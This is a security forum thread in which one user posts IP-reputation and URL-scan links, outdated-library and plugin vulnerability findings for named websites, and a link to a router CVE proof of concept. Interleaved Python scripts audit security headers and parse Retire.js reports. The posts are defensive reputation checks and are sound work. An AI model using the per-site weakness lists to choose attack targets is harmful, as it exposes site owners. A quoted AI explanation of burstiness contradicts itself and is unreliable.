26.6% Phishing

For all cases your Avast Online Security & Privacy protection does a far better job, and stops them.

Another check site with random example: https://www.ipqualityscore.com/threat-feeds/malicious-url-scanner/https%3A%2F%2Fapp.simplenote.com%2Fpublish%2FXhRdVc

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2023, 02:25:45 PM
Checking on open phish domains:
Re: https://urlscan.io/result/8a99e7e5-fe6e-4b34-a6f1-826b8093f057/dom/
and  blacklisted: https://sitecheck.sucuri.net/results/https/bigappboi.com/cl/i/qk4l8w
Abuse on Amazon: https://www.abuseipdb.com/whois/23.22.126.183
Adblocked, see: https://urlscan.io/result/8a99e7e5-fe6e-4b34-a6f1-826b8093f057/#indicators

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2023, 03:45:13 PM
Be aware of malicious IP -> https://www.criminalip.io/en/asset
Either critical or dangerous IP.

Also compare results (random IP example):
https://www.projecthoneypot.org/ip_191.102.153.111

then https://maltiverse.com/ip/191.102.153.111

https://www.virustotal.com/gui/url/81b11697fd251b1b1b4d9ef4583de0f4dd1a08d63386866b930e2d136d260987/details

and here: https://www.malwareworld.com/
Quote
Malicious: true for 35.146.254.16
Type: BadReputation
Location: Lat(37.87085623213167) - Long(-97.78518256324038)
References:
    https://www.maxmind.com/en/high-risk-ip-sample-list
    https://raw.githubusercontent.com/stamparm/ipsum/master/ipsum.txt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2023, 06:21:21 PM
Website access scanner: (random example)

https://accessify.com/t/torry.io
&
https://www.accessify.com/d/search.disconnect.me

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 21, 2023, 04:48:28 PM
Evaluating: https://urlscan.io/result/cbeb3a97-46f1-40e1-ac29-1282dee7f249/#indicators
one of the contacts scanned with Trustpilot:
https://www.trustpilot.com/review/tradepub.com

Found to be safe: https://check.trendmicro.com/page/QuickStart?s=agrdy.com

Avast Online extension detects tracking:
Ad-tracking 1 detected
Webanalysis 1 detected

Also see: https://www.shodan.io/domain/www.tradepub.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2023, 04:41:51 PM
Not malicious as such, but a WordPress website with 5 vulnerabilities:

https://urlscan.io/result/a35090de-1468-4b6c-abff-e0bc60b85568/

WordPress CMS outdated, outdated plug-ins:
   contact-form-7 5.7.4   Warning   latest release (5.7.5.1)   https://contactform7.com/
   wordpress-seo 20.2   Warning   latest release (20.5)   https://yoa.st/1uj

User Enumeration is not set to disabled.

Not flagged here: https://www.virustotal.com/gui/url/07d830d285a2eefc2c79496894e312b559aa8076ead43f87bf2e83c2d60b8f10?nocache=1

polonus


Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2023, 09:32:52 PM
Analysis of a website could hint at possible vulnerabilities,
see the following scenario, which made me aware of a potential XSS flaw.

I checked and scanned this particular site at https://urlscan.io/ here:
https://urlscan.io/result/7d2197aa-190e-4d94-b841-fa87807f5516/
and then stumbled at the following cookie via: https://urlscan.io/result/7d2197aa-190e-4d94-b841-fa87807f5516/#behaviour

This website could be open to an XSS attack, read: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1729
because of this cookie: -savelife.in.ua/   1970-01-20 11:57:49   Name: AWSALBCORS  (and what change should be applied to prevent this)

polonus (3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 12:05:55 PM
Fraudulent IP check - below zero is better.

Example: https://www.ip-lookup.org/score/151.101.193.69

A fraud score of 15, certainly too much (check through Netcraft extension and Shodan as well)
https://scamalytics.com/ip/65.55.252.93

Not only for checking IP: https://www.abuseipdb.com/check?query=https%3A%2F%2Fwww.timeloopsolution.com%2F

Another checker: https://www.abuseipdb.com/check?query=https%3A%2F%2Fwww.timeloopsolution.com%2F

Re: https://www.ipvoid.com/ip-blacklist-check/

And detecting those that wanna stay under the detection radar:
Read: https://medium.com/@xianghangmi/resident-evil-understanding-residential-ip-proxy-as-a-dark-service-dea9010a0e29

Use: https://intelx.io/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 01:32:44 PM
Here we have a potentially malicious or suspicious IP address:
https://www.virustotal.com/gui/ip-address/46.173.84.81

See: https://www.abuseipdb.com/check/46.173.84.81

from: https://sitereport.netcraft.com/?url=http://46.173.84.81

1 to detect.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2023, 10:25:20 PM
Establishing vulnerabilities on a particular website with asserted IP abuse.

Compare various scan results:

https://www.abuseipdb.com/check/46.149.182.124  (random example)
Re: https://www.shodan.io/host/46.149.176.5  (with all vuln. given there )  on that Apache HTTP-server *

No threat in data exchanges - 3 trackers blocked - No restrictions found.

Missing intermediate TLS certificate   running on  Apache 2.4.41, Ubuntu *

CMS: WordPress 6.2.1

Powered by: Unknown  - 4 WordPress issues -

1. outdated CMS,

2.   Plugin   Update Status   About
woocommerce 7.3.0   Warning   latest release (7.7.0)
hxtps://woocommerce.com/

3. 4. User enumeration and directory listing not set at disabled.

Further website config issues
Quote
Protection
No website application firewall detected.
Please install a cloud-based WAF to prevent website hacks and DDoS attacks.

Security Headers
Missing security header for ClickJacking Protection. Alternatively,
you can use Content-Security-Policy: frame-ancestors 'none'.

Missing security header to prevent Content Type sniffing.

Missing Strict-Transport-Security security header.

Missing Content-Security-Policy directive. We recommend to add the following CSP directives
(you can use default-src if all values are the same): script-src, object-src, base-uri, frame-src

Default server banners displayed. Your site is displaying your web server default banners.

quote-info from a sucuri website scan result.

Strange, as here the IP is given as above board: https://www.ip-lookup.org/score/46.149.176.5

Another source to check with - 4 detect: https://www.criminalip.io/en/asset/report/209.97.181.37

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
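The gaps listed in the Sucuri quote above (clickjacking protection, content-type sniffing, HSTS, the recommended CSP directives, default server banners) and the CSP designer string from the earlier cdn77/otto post can both be checked offline from a captured set of response headers. The script below is an added example written for this thread, not code from Sucuri, otto or any other tool mentioned here; the two header sets are constructed samples, the designer policy is copied from that earlier post, and the six-month HSTS minimum is a threshold chosen here.

```python
"""Audit captured HTTP response headers for the hardening gaps named in the
Sucuri scan quoted above, and evaluate a Content-Security-Policy string.
Added example for this thread; the header sets are constructed samples,
not captured from any site mentioned in it."""
import re

# Constructed weak response, modelled on the scan result: banner with version,
# no CSP, no HSTS, no anti-sniffing header, no clickjacking protection.
WEAK_HEADERS = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "Content-Type": "text/html; charset=UTF-8",
}

# The same response after the recommended headers are added (constructed).
HARDENED_HEADERS = {
    "Server": "Apache",
    "Content-Type": "text/html; charset=UTF-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'; "
                               "base-uri 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}

# Policy string exactly as produced by the CSP designer in the earlier post.
DESIGNER_CSP = "default-src 'self' ; worker-src 'self' blob: ; script-src 'self' 'unsafe-eval' 'unsafe-inline'"

SIX_MONTHS = 180 * 24 * 3600  # minimum HSTS max-age accepted here (a chosen threshold)


def header(headers, name):
    """Case-insensitive lookup; HTTP header names are not case-sensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_csp(policy):
    """Split a CSP string into {directive: [source tokens]}; directives are ';'-separated."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def audit_csp(policy):
    """Findings for a CSP: directives with no effective fallback, unsafe script sources."""
    findings = []
    csp = parse_csp(policy)
    default = csp.get("default-src")
    # Fetch directives fall back to default-src when absent; frame-src tries
    # child-src first; base-uri has no fallback at all and must be set explicitly.
    fallback = {
        "script-src": default,
        "object-src": default,
        "frame-src": csp.get("child-src", default),
        "base-uri": None,
    }
    for directive, fb in fallback.items():
        if directive not in csp and fb is None:
            findings.append(f"csp: {directive} is not set and has no fallback")
    scripts = [s.lower() for s in csp.get("script-src", default or [])]
    for keyword in ("'unsafe-inline'", "'unsafe-eval'"):
        if keyword in scripts:
            findings.append(f"csp: script-src allows {keyword}")
    if "*" in scripts:
        findings.append("csp: script-src allows scripts from any origin")
    return findings


def audit_headers(headers):
    """Return a list of findings for one response (empty list means every check passed)."""
    findings = []
    csp_value = header(headers, "Content-Security-Policy")
    csp = parse_csp(csp_value) if csp_value else {}

    # Clickjacking: either X-Frame-Options or CSP frame-ancestors is acceptable.
    if header(headers, "X-Frame-Options") is None and "frame-ancestors" not in csp:
        findings.append("clickjacking: no X-Frame-Options and no CSP frame-ancestors")

    xcto = header(headers, "X-Content-Type-Options")
    if xcto is None or xcto.strip().lower() != "nosniff":
        findings.append("sniffing: X-Content-Type-Options: nosniff is missing")

    hsts = header(headers, "Strict-Transport-Security") or ""
    max_age = re.search(r"max-age=(\d+)", hsts, re.IGNORECASE)
    if max_age is None:
        findings.append("hsts: Strict-Transport-Security header is missing")
    elif int(max_age.group(1)) < SIX_MONTHS:
        findings.append("hsts: max-age is shorter than six months")

    if csp_value is None:
        findings.append("csp: Content-Security-Policy header is missing")
    else:
        findings.extend(audit_csp(csp_value))

    server = header(headers, "Server")
    if server and re.search(r"/\d", server):
        findings.append(f"banner: Server header discloses a version: {server}")
    return findings


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or ["all checks passed"])
    print("designer CSP", audit_csp(DESIGNER_CSP))
```

Feed it the headers of a real response (for instance the dict returned by `requests.get(...).headers`) and the weak set reproduces the five Sucuri findings, while the designer policy shows why a CSP that exists can still be weak: `'unsafe-inline'` and `'unsafe-eval'` re-enable the script execution the policy was meant to restrict, and `base-uri` left unset has no fallback to `default-src`.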

Title: Re: Tests and other Media topics
Post by: polonus on May 20, 2023, 05:15:08 PM
Under attack - https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/

IP flagged here: https://www.abuseipdb.com/check/45.146.165.91

Various resources will give insights into the actual threat theatre.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 03, 2023, 02:32:14 PM
Test your browser here for CSS Exfil Vulnerabilities:
https://www.mike-gualtieri.com/css-exfil-vulnerability-tester

Protect your browser with an extension:
https://chrome.google.com/webstore/detail/css-exfil-protection/ibeemfhcbbikonfajhamlkdgedmekifo

When on firefox: https://addons.mozilla.org/en-US/firefox/addon/css-exfil-protection/

With the upcoming CSS scanning of everybody online,
certainly worth protecting yourself as best you can,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2023, 01:14:17 PM
Ad tracking link being blocked on:
htxps://thebakermama.com/wp-content/
-> following JS link: hxtps://static.cloudflareinsights.com/beacon.min.js/v52afc6f149f6479b8c77fa569edb01181681764108816

Also: https://urlscan.io/result/5b385e2c-bd39-48dd-92be-0bd87f9c8280/

Privacy Badger blocks 4 trackers. Site = Yoast SEO plug-in optimized.

We are strongly advised by Dr.Web's against visiting:
-aax.amazon-adsystem.com listed at:
https://urlscan.io/result/5b385e2c-bd39-48dd-92be-0bd87f9c8280/#indicators

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2023, 03:12:18 PM
Checking on payload delivery example where we found it-> https://urlhaus.abuse.ch/url/2671474/
Re: https://www.virustotal.com/gui/file/4293c1d8574dc87c58360d6bac3daa182f64f7785c9d41da5e0741d2b1817fc7/detection/f-4293c1d

Re: https://www.abuseipdb.com/check/117.219.113.72

and https://www.shodan.io/search?query=bsnl.in

Then we could meet here with these MikroTik-router-OS-vulnerabilities:
https://cyber.vumetric.com/vulns/mikrotik/routeros/6-39-2/

e.g. a crashdump of one mentioned: https://github.com/cq674350529/pocs_slides/blob/master/advisory/MikroTik/CVE-2022-45315/README.md

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 28, 2023, 06:58:36 PM
You would not expect to find following vulnerabilities on such a website like eff dot org, as mentioned here:

Quote
Retire.js
jquery-ui   1.10.2   Found in -https://www.eff.org/files/js/js_x2A4oj9_rCj5CWR_dGMHrobZW14ZVI9ruZKCDG7yyfM.js _____Vulnerability info:
Low   XSS when refreshing checkboxes if usercontrolled data in labels 2101 CVE-2022-31160   
Medium   CVE-2021-41184 XSS in the `of` option of the `.position()` util   12
Medium   CVE-2021-41183 15284 XSS Vulnerability on text options of jQuery UI datepicker   
Medium   CVE-2021-41182 XSS in the `altField` option of the Datepicker widget   12
Medium   CVE-2022-31160 XSS when refreshing a checkboxradio with an HTML-like initial text label   
jquery.datatables   1.10.18   Found in -https://www.eff.org/files/js/js_Q6bf8MyLqauBH0V6N-qDG8KuvtMOI0HbAR9o9acrMQc.js _____Vulnerability info:
Low   possible XSS 2   
High   prototype pollution 3   
Medium   prototype pollution 4   1
jquery   1.12.4   Found in -https://www.eff.org/files/js/js_qd8BaywA4mj4edyGLb52Px4-BwFqScI7dgPymNmaueA.js _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   

Re also: https://www.shodan.io/search?query=eff.org

Page-, header- and cookie-security: found no best policies implemented for cache-control, csp, search-block-form headers.

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
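The Retire.js findings quoted above come out of the extension as one "Found in" header line per library followed by one line per finding. The following is an added example, not Retire.js code or anything from Erlend Oftedal or eff.org: a parser that turns that pasted text into a per-library triage table (finding count, worst severity, CVE list). The embedded report is a shortened copy of the quote above; the severity ranking and the "high" triage cut-off are choices made here.

```python
"""Parse a Retire.js report pasted in the text form quoted above and
summarise it per library. Added example; REPORT is a shortened copy of the
quoted output and the severity ranking is a choice made here."""
import re

REPORT = """\
Retire.js
jquery-ui   1.10.2   Found in -https://www.eff.org/files/js/js_x2A4oj9_rCj5CWR_dGMHrobZW14ZVI9ruZKCDG7yyfM.js _____Vulnerability info:
Low   XSS when refreshing checkboxes if usercontrolled data in labels 2101 CVE-2022-31160
Medium   CVE-2021-41184 XSS in the `of` option of the `.position()` util   12
jquery.datatables   1.10.18   Found in -https://www.eff.org/files/js/js_Q6bf8MyLqauBH0V6N-qDG8KuvtMOI0HbAR9o9acrMQc.js _____Vulnerability info:
Low   possible XSS 2
High   prototype pollution 3
Medium   prototype pollution 4   1
jquery   1.12.4   Found in -https://www.eff.org/files/js/js_qd8BaywA4mj4edyGLb52Px4-BwFqScI7dgPymNmaueA.js _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS
"""

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}
RANK_NAME = {rank: name for name, rank in SEVERITY_RANK.items()}

# "<library>   <version>   Found in <file> ..." opens a new library section.
HEADER_RE = re.compile(r"^(?P<component>\S+)\s+(?P<version>\d[\w.\-]*)\s+Found in\s+(?P<file>\S+)")
# "<Severity>   <free text, possibly containing CVE ids>" is one finding.
FINDING_RE = re.compile(r"^(?P<severity>Low|Medium|High|Critical)\s+(?P<text>.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_retire_report(text):
    """Return a list of {component, version, file, findings} dicts in report order."""
    components = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        head = HEADER_RE.match(line)
        if head:
            current = {"component": head["component"], "version": head["version"],
                       "file": head["file"], "findings": []}
            components.append(current)
            continue
        finding = FINDING_RE.match(line)
        if finding and current is not None:  # lines before any header are ignored
            current["findings"].append({
                "severity": finding["severity"].lower(),
                "cves": sorted(set(CVE_RE.findall(finding["text"]))),
                "text": finding["text"],
            })
    return components


def summarize(components):
    """Per-library triage row: version, number of findings, worst severity, CVE ids."""
    summary = {}
    for comp in components:
        worst = max((SEVERITY_RANK[f["severity"]] for f in comp["findings"]), default=0)
        summary[comp["component"]] = {
            "version": comp["version"],
            "findings": len(comp["findings"]),
            "worst": RANK_NAME.get(worst, "none"),
            "cves": sorted({cve for f in comp["findings"] for cve in f["cves"]}),
        }
    return summary


def needs_attention(summary, minimum="high"):
    """Libraries whose worst finding is at or above the given severity."""
    threshold = SEVERITY_RANK[minimum]
    return sorted(name for name, row in summary.items()
                  if SEVERITY_RANK.get(row["worst"], 0) >= threshold)


if __name__ == "__main__":
    table = summarize(parse_retire_report(REPORT))
    for name, row in table.items():
        print(f"{name:<20} {row['version']:<8} {row['findings']} findings, worst {row['worst']}, {row['cves']}")
    print("fix first:", needs_attention(table))
```

The point of the per-library roll-up is that a long list of Medium CVEs against jQuery reads as noise, while the single High (prototype pollution) against DataTables is the one upgrade to schedule first; the cut-off can be lowered to "medium" to list every library that needs an update.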
Title: Re: Tests and other Media topics
Post by: polonus on June 28, 2023, 10:13:04 PM
Another IP detection here: https://urlscan.io/result/389db7e9-b90a-4bce-acb9-dc6ed2d421af/#indicators

Final url VT (not reflecting that it is a parked site, see js file): https://www.virustotal.com/gui/url/ed66488c77223438dbd68d0b4f6ce123e1d75352cadbb7e70997535ba896cebb/details  -> -http://ww1.soureladim.com/js/parking.2.105.7.js

IP blacklisted: https://www.abuseipdb.com/check/199.59.243.223

polonus

Title: Re: Tests and other Media topics
Post by: polonus on July 02, 2023, 03:32:23 PM
Flagged: https://www.abuseipdb.com/check/178.128.165.94  *
Flagged as attack source: https://db-ip.com/178.128.165.94

High Risk: Attack target(s)   Mail, SSH (and other abuse mentioned here *)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2023, 12:30:49 PM
Compare resources to check abuse IPs,

Re: https://ip-sc.net/en/r/82.176.30.210
and at AbuseIPDB.com  both qualify as risk High. https://www.abuseipdb.com/check/82.176.30.210

Another source to check against: https://scamalytics.com/ip/82.176.30.210  Fraud risk - 51%.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2023, 02:53:32 PM
Another resource to check against: https://www.abuseipdb.com/check/94.102.61.22
and also flagged here: https://www.abuseipdb.com/check/94.102.61.22  (flagged as spammer)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2023, 06:54:37 PM
In this way we also get informed about the vulnerabilities that can be abused on a certain IP.

See: https://www.abuseipdb.com/check/128.199.52.45

and see existing vulnerabilities here: https://www.shodan.io/host/128.199.52.45

Also:
nextjs   12.3.4   Found in https://www.digitalocean.com/_next/static/chunks/main-d84ea29d76d456a4.js
also: https://www.shodan.io/search?query=digitalocean.com

Also: https://ipinfo.io/174.138.100.127  (not flagged)

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 13, 2023, 11:51:21 AM
Checking online at SafeToOpen: -http://login.reclamefolder.nl
Results
Quote
Scan date/time:
13/Jul/2023 09:31:53 PM

HTML title:
Foutmelding |   Error

SSL issuer:
R3

SSL validity:
89 days

SSL age:
SSL issued 64 days ago

Favicon:
hxtps://login-static.dpgmedia.net/pip-components/favicon/default-favicon-32x32.png

Downloads:

and

Item   Original   Redirected
URL   -https://login.reclamefolder.nl/     -https://login.reclamefolder.nl/ 
FQDN   -login.reclamefolder.nl    -login.reclamefolder.nl
Domain Name   -login.reclamefolder.nl    -login.reclamefolder.nl
Domain Registration - Expiry      
IP Addr.   131.203.3.211    131.203.3.211
Hosted country   NZ   NZ
   Online source SafeToOpen online scan results.

Checked IP: https://www.shodan.io/host/131.203.3.211

Here it is getting interesting: https://urlscan.io/result/7ca297aa-1fe7-4e4b-b712-9cb5dc6e9840/

So is this extension/online scan site also profiling the end-users that work it?
9 detected files on this IP: https://www.virustotal.com/gui/ip-address/172.67.75.26/detection

Netcraft risk rating 1/10.  Vulnerability in content.js in on website in CLOUD14, San Francisco.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2023, 06:33:29 PM
Test your installed mobile apps for tracking and permissions.

Example: https://reports.exodus-privacy.eu.org/en/reports/org.blokada.alarm/latest/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2023, 02:15:15 PM
IP address vulnerabilities and related abuse.

Re: https://www.shodan.io/host/128.199.33.46  (see under general information)

Re: https://www.abuseipdb.com/check/128.199.33.46  (recent reports of abuse)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2023, 04:05:05 PM
Threat resources - example https://otx.alienvault.com/indicator/ip/192.241.201.18

Verify with other resources - also https://www.abuseipdb.com/check/192.241.204.201

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 01, 2023, 11:40:57 AM
Info on abuse IPs: https://www.abuseipdb.com/check/45.95.146.35  (random example)

On IP domain: https://www.shodan.io/search?query=mx.ebrandnews.com

and https://www.shodan.io/host/45.95.146.35

Just go over all the vulnerabilities there.

Just recently patched: https://thehackernews.com/2023/07/gameoverlay-two-severe-linux.html
-> https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability

polonus

Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2023, 01:20:11 PM
Check on: https://www.abuseipdb.com/check/83.8.131.51
also here: https://db-ip.com/83.8.131.51 

(also there this IP-address is given as high risk attack source).

Read on attacks: https://venafi.com/blog/attacks-linux-servers-cloud-rise-ssh-abusing-malware/

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 18, 2023, 03:16:42 PM
Next check against greynoise:
Re: https://www.abuseipdb.com/check/167.71.68.224
and https://viz.greynoise.io/ip/167.71.68.224  verdict malicious.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2023, 02:25:56 PM
Fine resources via https://dnsdumpster.com/  on dns recon
Also read this: https://dnsdumpster.com/footprinting-reconnaissance/

As a cold reconnaissance website security analyst and website error-hunter, I also use these resource instances.

What is happening in the EU - official open DNS in the European Union -> https://www.dns0.eu/nl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2023, 12:27:58 PM
Checking on malicious IP, several resources: Recapitulation:
See this resource: https://www.fortypoundhead.com/tools_ipcheck.asp
And mentioned source also reports here: https://www.abuseipdb.com/user/30078 (random example, mind the challenge)
Re: https://www.ipqualityscore.com/ip-reputation-check
Re: https://scamalytics.com/ip  and https://dnschecker.org/ip-blacklist-checker.php
Re: https://talosintelligence.com/reputation_center/
See: https://viz.greynoise.io/ip/167.71.68.224 random example
and of course VT - https://www.virustotal.com/gui/home/upload

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 04, 2023, 05:02:04 PM
More IP resources, translated and leading to Snort, Suricata IP-rules detection base here:
Example: https://www.criminalip.io/asset/report/94.102.61.45
See: https://www.virustotal.com/gui/url/4b18e42419ca1e90b14ec300c4fd582fa97d7d034f41c61bbba41ef2413e4ab8/links
See: https://www.shodan.io/search?query=security.criminalip.com
Re: https://www.abuseipdb.com/check/94.102.61.45

Another example: https://www.criminalip.io/asset/report/202.125.94.71
12 to flag here: https://www.virustotal.com/gui/ip-address/202.125.94.71
Additional: https://www.shodan.io/host/202.125.94.71
IP stems from Indonesia Raja - found here: https://blacklist.3coresec.net/lists/et-open.txt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 19, 2023, 04:40:28 PM
Check abuse on a whitelisted cloud-IP: https://www.abuseipdb.com/check/172.71.102.128
Nothing here: https://db-ip.com/172.71.102.128
VT warns for ThreatFox IOCs for 2023-08-22 - according to source ArcSight Threat Intelligence - 1 month ago
IcedID botnet C2 domain (confidence level: 70%) 
Also see: https://intelx.io/?s=172.71.1
Risk on the server (6) : https://scamalytics.com/ip/172.71.102.128
Quote
Too bad! The connection with your website is not or insufficiently secured (HTTPS). Therefore information in transit between your website and its visitors is not sufficiently protected against eavesdropping and tampering. You should ask your hosting provider to enable HTTPS and to configure it securely.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2023, 12:35:57 PM
Test example pulsedive - https://pulsedive.com/ioc/snap.licdn.com
Website was blocked by Privacy Badger and uBlock.
Blocked - hXtps://px.ads.linkedin.com/ *
The connection with the website is not or insufficiently secured.

* see: https://pulsedive.com/indicator/?iid=2650031 -> https://www.shodan.io/host/13.107.42.14
Given as clean: https://www.virustotal.com/gui/url/0c06a12108cebe7ed95771d207a8f1e736d294a1c3c6caf787d1aecdea193bfd/details

Also consider search results here: https://intelx.io/?s=13.107.42.14

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2023, 11:12:46 PM
Cloudflare Radar website scanner - https://radar.cloudflare.com/scan/4920b4b5-185f-4da0-85ef-6961a98bde6f/technology
(random example)
Safe BGP scanner: https://isbgpsafeyet.com/

The AS/BGP Report is calculated for every allocated AS number. The report is updated on a weekly basis.
Example: https://dnslytics.com/bgp/as60144

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2023, 04:01:39 PM
Interesting IP resources: https://www.criminalip.io/asset/report/87.140.39.3 (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 14, 2023, 12:12:45 PM
Enhanced testing for web servers: https://en.internet.nl/article/release-1.8/

Enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 15, 2023, 01:16:24 PM
Was this post generated by AI? Test: https://www.scribbr.com/ai-detector/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 15, 2023, 05:53:05 PM
What does AI have to say about this?
Quote
Perplexity and burstiness are two measures used by AI detectors to determine the likelihood of a text being AI-generated.

1. Perplexity: Perplexity is a measure of how well a language model can predict the next word in a sequence of words. It quantifies how "surprised" the model is when encountering the actual next word. Lower perplexity indicates that the model can better predict the next word and understand the context accurately. In the context of AI detectors, if the perplexity of a given text is low, it suggests that the language in the text aligns with what AI models have been trained on, indicating a higher likelihood of being AI-generated.

2. Burstiness: Burstiness refers to the distribution of words or phrases in a text. AI detectors analyze the frequency of words or phrases appearing in short periods of time within the text. If the text exhibits a bursty pattern, meaning it contains repetitions or a sudden high concentration of certain words or phrases, it indicates a higher likelihood of being generated by an AI system. Burstiness occurs because language models often generate text by copying and repeating chunks of text they have seen during the training process.

By combining these two factors, AI detectors can assess the similarity between the analyzed text and the patterns typically generated by AI language models, helping to identify the presence of AI-generated content.

Perplexity refers to how well a language model can predict the next word in a sequence of words. It measures how surprised the model is when it encounters new text. If a text has low perplexity, it means that the language model finds the text more predictable and therefore, potentially more likely to be AI-generated.

Burstiness, on the other hand, refers to the statistical distribution of words in a text. It measures how frequently certain words or phrases occur in a given context. AI-generated text often has low burstiness because the language models tend to generate text that is diverse and less repetitive.

In summary, perplexity and burstiness are metrics that help AI detectors determine the likelihood of a text being AI-generated. Low perplexity and burstiness suggest a higher probability of AI involvement.
(quoted from an AI Chat explanation)

polonus
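The two detector signals the quote above describes, computed on constructed text. This is an added example, not code from Scribbr or the quoted chatbot: the "language model" is a tiny add-one smoothed bigram model trained on an inline corpus (an assumption standing in for a real model), and burstiness is taken as the coefficient of variation of sentence length, one common operationalization.

```python
import math
import re
from collections import Counter
from typing import List

def tokenize(text: str) -> List[str]:
    return re.findall(r"[a-z']+", text.lower())
def sentences(text: str) -> List[str]:
    return [s for s in re.split(r"(?<=[.!?])\s+", text.strip()) if s]

class BigramLM:
    """Add-one smoothed bigram model: P(w|prev) = (c(prev,w)+1) / (c(prev)+V)."""
    def __init__(self, corpus: str):
        toks = ["<s>"] + tokenize(corpus)
        self.vocab = set(toks) | {"<unk>"}          # unseen words map to <unk>
        self.bigrams = Counter(zip(toks, toks[1:]))
        self.prev_counts = Counter(toks[:-1])       # how often each word is a left context

    def _norm(self, w: str) -> str:
        return w if w in self.vocab else "<unk>"

    def log_prob(self, prev: str, w: str) -> float:
        prev, w = self._norm(prev), self._norm(w)
        return math.log((self.bigrams[(prev, w)] + 1) /
                        (self.prev_counts[prev] + len(self.vocab)))

    def perplexity(self, text: str) -> float:
        """exp of the mean negative log-probability per predicted token: low = predictable."""
        toks = ["<s>"] + tokenize(text)
        total = sum(self.log_prob(p, w) for p, w in zip(toks, toks[1:]))
        return math.exp(-total / (len(toks) - 1))

def burstiness(text: str) -> float:
    """Coefficient of variation of sentence length (std / mean); 0.0 = all sentences equal."""
    lengths = [len(tokenize(s)) for s in sentences(text)]
    if len(lengths) < 2:
        return 0.0
    mean = sum(lengths) / len(lengths)
    var = sum((n - mean) ** 2 for n in lengths) / len(lengths)
    return math.sqrt(var) / mean

# Constructed reference corpus standing in for a model's training data.
CORPUS = ("The scanner checks the site for outdated plugins. "
          "The scanner flags an outdated plugin as a risk. "
          "Update the plugin to remove the risk.")
PREDICTABLE = "The scanner flags an outdated plugin as a risk."   # only bigrams seen in CORPUS
NOVEL = "Quantum ferrets juggle violet umbrellas beneath Saturn."  # nothing the model has seen
UNIFORM = "The site is safe. The scan is done. The risk is low."   # three 4-word sentences
VARIED = "Hmm. The scanner, after a long and surprisingly thorough look at every plugin, found nothing. Fine."

if __name__ == "__main__":
    lm = BigramLM(CORPUS)
    for s in (PREDICTABLE, NOVEL):
        print(f"perplexity {lm.perplexity(s):8.2f}: {s}")
    for s in (UNIFORM, VARIED):
        print(f"burstiness {burstiness(s):8.2f}: {s}")
```

With only 18 vocabulary entries the absolute perplexities mean little; what the run shows is the ordering a detector relies on (the reused phrasing scores far lower than the unseen one, and the uniform sentences score zero burstiness).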
Title: Re: Tests and other Media topics
